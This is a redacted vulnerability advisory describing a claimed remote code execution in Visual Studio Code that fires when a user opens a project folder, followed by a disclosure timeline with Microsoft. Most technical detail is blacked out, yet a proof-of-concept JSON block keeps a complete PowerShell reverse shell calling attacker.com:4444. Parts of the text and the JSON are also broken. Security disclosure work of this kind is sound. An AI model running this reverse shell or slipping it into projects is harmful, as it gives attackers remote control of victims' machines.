Arbitrary Remote Code Execution via ██ in Visual Studio Code
Arbitrary Remote Code Execution via ██████████ Visual Studio Code Bypassing ████████████
Executive Summary
A critical security vulnerability I Found discovered in Microsoft Visual Studio Code’s runner framework that allows attackers to achieve arbitrary remote code execution on victim machines. The vulnerability exploits the automatic execution feature in VS Code’s █████████████████████ bypassing █████, enabling malicious code to run silently when a user opens a project folder.
Vulnerability Details
████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
Root Cause Analysis
█████████████████████████████████████████████████████████████████████████████████████████████████████████
Key Security Flaws:
- █████████████████████
- ███████████████████████████████████████████████████████████████
- █████████████████████
- █████████████████████████████████████████████████████████████████████████████████████████████████████████
Proof of Concept
Malicious Repository Setup
Step 1: Create Bypass Malicious Structure
█████████████████████
██████████████████████████████████████████
███████████████████████████████████████████████████████████████
█████████████████████
██████████████████████████████████████████
██████████████████████████████████████████Step 3: Repository Distribution
█████████████████████Exploitation Flow
███████████████
Advanced Reverse Shell
█████████████████████
{
"args": [
"████████████", "██████",
"█████████",
"$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
],
}
]
}MSRC Response and Timeline
Disclosure Timeline
| Date | Event | Status |
|---|---|---|
| 2025-01-15 | Initial discovery | Vulnerability identified |
| 2025-03-16 | PoC development | Exploitation confirmed |
| 2025-07-17 | Microsoft MSRC notification | Report submitted |
| 2025-07-30 | MSRC Acknowledgment | Bounty Appreciated $**K |
| 2025-08-05 | Redacted disclosure | Advisory published |
| PENDING | Patch development | Pending CVeS |
Conclusion
This vulnerability represents a critical security flaw in one of the world’s most popular code editors, affecting millions of developers globally. The ability to ██████ arbitrary code execution through a ██████ ███ bypass file poses significant risks to individual developers, enterprises, and the broader software supply chain.
Report ID ↓
References
Acknowledgements
Discovered by: @odaysec (ZDG Asian Groups)
Research Team: Zeroday ZDG Asian Groups
Disclosure Pending: Coordinated disclosure via Microsoft MSRC
This advisory is currently in a restricted disclosure phase. Due to the sensitive nature of the vulnerability and the potential for exploitation prior to coordinated disclosure, detailed write-ups, exploit proofs-of-concept, and payload samples are temporarily redacted. Full technical details will be released once the CVE assignment is confirmed and the vendor’s patch is publicly available.